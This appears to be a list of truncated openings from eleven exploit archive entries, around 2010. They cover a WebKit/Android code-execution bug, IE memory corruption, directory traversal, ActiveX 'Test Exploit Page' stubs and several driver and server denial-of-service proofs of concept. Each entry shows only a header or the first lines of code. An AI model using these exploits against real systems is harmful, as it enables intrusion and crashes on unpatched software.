html head script // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android :) //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1 //patc
====================================================================== DeluxeBB = 1.3 Private Info Disclosure Vis Intelligendi ====================================================================== VIS INTELLIGENDI http://vis-intelligendi.co.cc Un h
# Exploit Title: Fermitter Server FTP Directory Traversal # Date: Nov 06, 2010 # Author: chr1x # Software Link: http://acritum.com/software/dist/fem-dist.exe # Description: Acritum Femitter HTTP-FTP Server is an easy-to use HTTP and FTP server appli
1.Description: The HookCentre.sys kernel driver distributed with G Data TotalCare 2011 contains a race condition vulnerability in the handling arguments of NtOpenkey function. Exploitation of this issue allows an attacker to crash system(make infamo
html Test Exploit Page object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' //object script language='vbscript' targetFile = C:Program FilesRationalcommonltdlg11n.ocx prototype = Property Let Bitmap As Long memberName = Bitmap
html Test Exploit Page object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' //object script language='vbscript' targetFile = C:Program FilesRationalcommonltdlg11n.ocx prototype = Function GetColorRes ( ByVal hWnd As Long ) As
html Test Exploit Page object classid='clsid:00110100-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' //object script language='vbscript' targetFile = C:Program FilesRationalcommonltlst11n.ocx prototype = Function Insert ( ByVal Bitmap As Long , ByVal
Exploit Title :Filefuzzer Denial of service vulnerability Software : Filefuzzer Software link :http://labs.idefense.com/software/fuzzing.php Autor : Sweet Email : charif38@hotmail.fr Date : 5/11/2010 Tested on : WinXp sp3 eng | Vmware Software detai
#!/usr/bin/perl # Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit # Date: 25.10.10 # Tool: Sami HTTP Server -- Version: 2.0.1 # Vendor-Website: http://www.karjasoft.com/old.php # Download Link: http://www.karjasoft.com/fi
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com #
/* # Exploit Title: Avast! Internet Security aswtdi.sys 0day Local DoS PoC # Date: 2010-11-04 # Author: Nikita Tarakanov (CISS Research Team) # Software Link: http://www.avast.com # Version: up to date, version 5.0.677, aswtdi.sys version 5.0.677 #